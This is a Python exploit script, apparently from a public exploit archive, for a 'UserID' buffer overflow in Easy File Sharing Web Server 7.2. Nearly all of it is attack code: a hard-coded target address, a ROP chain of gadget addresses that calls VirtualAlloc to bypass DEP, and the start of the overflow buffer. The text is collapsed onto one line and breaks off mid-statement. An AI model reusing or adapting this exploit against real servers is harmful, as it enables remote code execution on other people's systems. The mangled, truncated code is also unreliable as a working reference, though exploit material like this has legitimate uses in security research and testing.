#!/usr/bin/env python #---------------------------------------------------------------------------------------------------# # Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Buffer Overflow (DEP Bypass) # # Date : 05/20/2018 # # Exploit Author : Manoj Ahuje # # Linkedin : https://www.linkedin.com/in/manojahuje/ # # Vendor Homepage : http://www.sharing-file.com/ # # Software Link : http://www.sharing-file.com/efssetup.exe (7.2) # # Tested on : Windows 7 Ultimate (x86) - Service Pack 1 # #---------------------------------------------------------------------------------------------------# import requests import struct import sys, socket host='192.168.129.175' port=80 # rop chain # Modified by Hashim Jawad - kudos # rop_gadgets = [ # 0x005488bd, # POP EAX # RETN [fsws.exe] # 0x1004d1fc, # ptr to &VirtualAlloc() [IAT ImageLoad.dll] # 0x00519294, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fsws.exe] # 0x0040889a, # XCHG EAX,ESI # RETN [fsws.exe] # 0x005051bd, # POP EBP # RETN [fsws.exe] # 0x61c24169, # & push esp # ret [sqlite3.dll] # 0x004fad0e, # POP EBX # RETN [fsws.exe] # 0x00000001, # 0x00000001-> ebx # 0x00542678, # POP EDX # ADD CL,CL # RETN [fsws.exe] # 0x00001000, # 0x00001000-> edx # 0x00542dc6, # POP ECX # RETN [fsws.exe] # 0x00000040, # 0x00000040-> ecx # 0x1000725d, # POP EDI # RETN [ImageLoad.dll] # 0x004fb50b, # RETN (ROP NOP) [fsws.exe] # 0x005056b4, # POP EAX # RETN [fsws.exe] # 0x90909090, # nop # 0x00416598, # PUSHAD # RETN [fsws.exe] # ] buffer="" # ESI = ptr to VirtualProtect() buffer += struct.pack('